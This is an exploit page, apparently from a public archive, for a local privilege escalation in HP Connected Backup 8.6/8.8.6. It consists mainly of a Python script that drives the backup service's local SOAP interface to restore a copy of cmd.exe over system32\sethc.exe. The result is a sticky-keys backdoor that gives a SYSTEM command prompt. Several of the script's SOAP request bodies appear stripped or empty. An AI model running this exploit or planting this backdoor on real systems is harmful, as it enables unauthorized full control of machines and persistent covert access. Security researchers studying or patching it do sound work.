HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation

Properties

Published:
24.01.2018
Target:
HP Connected Backup 8.6/8.8.6

Code

#Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64
 
import os
import sys
import time
import requests
from bs4 import BeautifulSoup
 
def send_request(body):
    url="http://localhost:16386/"
    headers = {"Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie": "CCSessionID=SessionID11"}
    response = requests.post(url, data=body, headers=headers)
    if response.status_code != requests.codes.ok:
        print "Non-200 response. Exiting..."
        sys.exit()
    else:
        return response.text
         
         
def get_tdate(response):
    soup = BeautifulSoup(response, "html.parser")
    tdate = soup.findAll("m-tdate")[0].string
    return tdate
     
#Copy cmd.exe to world-writeable folder
print "HP Connected Backup Privilege Escalation by Peter Lapp(lappsec)"
print "Copying cmd.exe to C:\\hpcb-privesc"
os.system("mkdir C:\\hpcb-privesc")
os.system("copy C:\\Windows\\system32\\cmd.exe C:\\hpcb-privesc\\sethc.exe")
         
print "Creating backup for C:\\hpcb-privesc\\sethc.exe"
 
#StartScan required before IncludeFile request will be accepted
send_request("""""")
 
time.sleep(3)
 
#Add file to backup
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==true""")
 
 
print "Initiating Backup"
#Start backup
 
send_request("""""")
 
print """Sleeping for 300 seconds to give time for backup to complete. 
If the script fails after this then change the sleep period to give the backup enough time to complete"""
 
time.sleep(300)
 
print "Initiating restore"
#PrepareRetrieve requires valid PID of process running as SYSTEM. PID 456 is common for Windows 7 but if it fails, try another
 
send_request("""456""")
 
#We have to get the m-TDate value for the file in order for the restore to work correctly
print "Getting m-TDate value"
fileinfo = send_request("""QzpcaHBjYi1wcml2ZXNjXA==""")
tdate = get_tdate(fileinfo)
 
print "Adding Restore file"
 
send_request("""QzpcaHBjYi1wcml2ZXNjXHNldGhjLmV4ZQ==false"""+tdate+"""""")
 
 
print "Setting alternate restore path to C:\\Windows\\system32\\"
 
send_request("""C:\Windows\system32false""")
 
 
#Set restore to replace existing file
send_request("""true""")
 
print "Restoring C:\\hpcb-privesc\\sethc.exe to C:\\Windows\\system32\\sethc.exe"
send_request("""""")
 
print "If it made it this far without an error, then you should now be able to log out, press SHIFT 5 times and be given a command prompt as SYSTEM. Enjoy!"